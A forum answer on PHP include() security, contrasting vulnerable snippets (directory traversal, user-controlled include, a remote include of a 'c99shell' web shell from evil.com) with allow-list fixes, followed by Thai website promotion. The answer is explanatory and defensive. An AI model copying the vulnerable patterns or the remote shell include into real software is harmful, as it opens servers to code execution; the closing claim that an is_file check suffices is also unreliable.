• May 17, 2018

    It all depends on how you implement it. If you specifically set the path, then it’s secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

    Insecure (Directory Traversal)

    <?php 
    include($_GET['file']);
    ?>

    Insecure (URL fopen – If enabled)

    <?php 
    include('http://evil.com/c99shell.php');
    ?>

    Insecure

    <?php 
    include('./some_dir/' . $_GET['file']);
    ?>

    Partially Insecure ( *.php files are vulnerable )

    <?php 
    include('./some_dir/' . $_GET['file'] . '.php');
    ?>

    Secure (Though not sure why anyone would do this.)

    <?php 
    $allowed = array(
        'somefile.php',
        'someotherfile.php'
    );
    
    if (in_array(basename($_GET['file']), $allowed)) {
        include('./includes/' . basename($_GET['file']));
    }
    ?>

    Secure

    <?php 
    include('./includes/somefile.php');
    ?>

    The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

    if(is_file($file)) {
        //other code, such as user verification and such should also go here
        include $file;
    }
    else { die(); }


เวอไนน์ไอคอร์ส

ประหยัดเวลากว่า 100 เท่า!






เวอไนน์เว็บไซต์⚡️
สร้างเว็บไซต์ ดูแลเว็บไซต์

Categories